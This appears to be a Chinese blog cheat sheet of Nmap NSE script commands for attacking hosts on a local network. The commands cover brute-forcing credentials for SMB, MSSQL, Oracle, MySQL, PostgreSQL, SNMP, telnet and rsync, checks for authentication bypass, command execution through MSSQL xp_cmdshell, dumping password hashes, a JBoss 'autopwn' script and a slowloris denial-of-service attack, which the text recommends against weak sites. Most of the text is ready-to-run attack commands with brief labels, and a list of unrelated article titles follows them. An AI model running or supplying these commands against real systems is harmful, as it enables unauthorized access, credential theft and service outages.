(1) nmap --script=auth 192.168.137.*

  负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

  (2)nmap --script=brute 192.168.137.*

  提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

  (3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*

  默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

  (4)nmap --script=vuln 192.168.137.*

  检查是否存在常见漏洞

  (5)nmap -n -p445 --script=broadcast 192.168.137.4

  在局域网内探查更多服务开启状况

  检查vnc bypass

  nmap  --script=realvnc-auth-bypass 192.168.137.4

  (1)检查vnc认证方式

  nmap  --script=vnc-auth  192.168.137.4

  获取vnc信息

  nmap  --script=vnc-info  192.168.137.4

  (2)smb扫描:

  smb破解

  nmap  --script=smb-brute.nse 192.168.137.4

  smb字典破解

  nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

  smb已知几个严重漏

  nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

  查看共享目录

  nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4

  查看会话

  nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

  系统信息

  nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

  (3)Mssql扫描:

  猜解mssql用户名和密码

  nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

  xp_cmdshell 执行命令

  nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

  (4)dumphash值

  nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4

  扫描root空口令

  nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

  列出所有mysql用户

  nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

  (5)Oracle扫描:

  oracle sid扫描

  nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

  oracle弱口令破解

  nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

  (6)其他一些比较好用的脚本

  nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

  nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync

  nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

  nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

  nmap -sU --script snmp-brute 192.168.137.4            snmp破解

  nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

  nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn

  nmap --script=http-methods.nse 192.168.137.4 检查http方法

  nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections

  nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

  nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

Nmap的高级扫描(脚本)相关推荐

  1. 【Nmap使用教程】黑客工具Nmap安装|下载|扫描教学,附2023最新安装包!

    nmap参考指南(Man Page) nmap(官方7.8中文版)端口扫描工具 nmap使用教程(初级篇) nmap使用教程(高级篇) 黑客工具-nmap的使用 nc使用教程 nmap中一些常用的NS ...

  2. nmap全开扫描,半开扫描_nmap扫描的阶段

    nmap全开扫描,半开扫描 Hello readers, hope you all doing well. 各位读者好,希望大家一切都好. For security researchers and h ...

  3. Nmap安装和扫描(一:Nmap安装和扫描基础知识点总结)

    实验目的及要求 完成VMware Workstations14平台安装,会应用相关操作: 完成Windows 7操作系统及Kali Linux操作系统的安装: 掌握安全扫描的概念.意义及应用分析: 掌 ...

  4. ★Kali信息收集★8.Nmap :端口扫描

    Kali信息收集~ 0.Httrack 网站复制机 http://www.cnblogs.com/dunitian/p/5061954.html Kali信息收集~ 1.Google Hacking ...

  5. 【KALI使用】17 主动信息收集——四层发现(TCP、UDP、使用 scapy 定刢数据包迕行高级扫描)

    目录 四层发现优缺点 TCP发现 使用 scapy 定刢数据包迕行高级扫描--发送3.4层组合包头 长组合语句 python脚本 UDP 脚本 总结: 只是记录 学习笔记 参考:这个 四层发现优缺点 ...

  6. 小白读iOS冗余资源扫描脚本

    随着公司项目的不断功能迭代,项目的体积越来越大,各种瘦身策略迫在眉睫.由于平时使用Linux高级命令和 shell脚本的机会不多,之前学的知识一下子想起来很难.所有趁着这次看脚本,重新温习一下. 本文 ...

  7. 高级扫描技术及原理介绍(转)

    高级扫描技术及原理介绍(转) 作者:refdom (refdom@263.net) Scan,是一切入侵的基础,扫描探测一台主机包括是为了确定主机是否活动.主机系统.正在使用哪些端口.提供了哪些服务. ...

  8. nmap加载nse脚本在内网渗透中的使用-上

    转载自:https://mp.weixin.qq.com/s/zEgHxJEOfaiYVZYmg7NnXA? 大多数情况下,大家都认为nmap只是一个扫描工具,而不把当成是一个渗透工具.nmap集成了 ...

  9. 你不知道的Nmap之空闲扫描

    前言 在渗透测试的过程中,我们会经常会用到Nmap进行信息收集.但是Nmap存在一个缺点就是在进行探测过程中会向目标发送大量数据包,从而产生大量流量,这样极其容易引起目标警觉,甚至追踪到渗透测试者的真 ...

最新文章

  1. 简单介绍实体类或对象序列化时,忽略为空属性的操作
  2. oracle数据库导入导出expdp/impdp命令详细操作过程
  3. 一个基于.Net 5开发的轻量级Quartz配置中心 - QuartzCore.Blazor
  4. c语言库文件是dll还是lib,C语言之静态链接库与动态链接库(2)
  5. php7 获取文件类型,太简单了!PHP获取文件扩展名的7中方法
  6. 怎么在Windows11上禁用文件资源管理器搜索历史记录
  7. linux gcc编译C程序 分享
  8. R语言:商业数据分析实例(4)【总结篇,回归】
  9. Python微信库:itchat的用法详解
  10. 什么是Linux内核?它有什么功能?
  11. 《费马大定理》-站在巨人的肩膀上
  12. 消除六边形html5,六边形消除
  13. 微信小程序中层叠轮播图(仿微信朋友圈swiper样式)
  14. 极化码:极化码的单项式码(Monomial Codes)表示
  15. Axure 9 收录不同效果的制作过程
  16. 什么是人工智能?什么是机器学习?什么是深度学习?三连问
  17. 无题(2012.5.11 摘自 人人网)
  18. SAP CO组织结构及概念
  19. java 获取当前hhmm_java 获取当前时间并转化为yyyy-MM-dd HH:mm:ss格式
  20. html中%3ch3%3e有颜色吗,在增强 iOS 通知系统这件事上,IFTTT 和 Pushover 谁做得更好?...

热门文章

  1. P53:进化了8亿年的抑癌基因
  2. 施一公:如何提高英文的科研写作能力
  3. mac使用的正确操作与注意事项(人体工程学)
  4. STM32H743+CubeMX-计算FDCAN2上的MessageRAMOffset(使两路FDCAN正常工作)
  5. java ssh优势_java框架组合ssm和ssh各自的优势是什么?
  6. vue中rules校验是验证首字符_小白也能秒懂Vue源码中那些精细设计(选项处理)...
  7. Linux笔记-解决QtCreator中qDebug不打印的问题
  8. Qt工作笔记-对setupUi(this)进一步理解
  9. 按英语体育计算机创建透视表,数据透视表和数据透视图概述
  10. android locknow,java – Android DevicePolicyManager lockNow()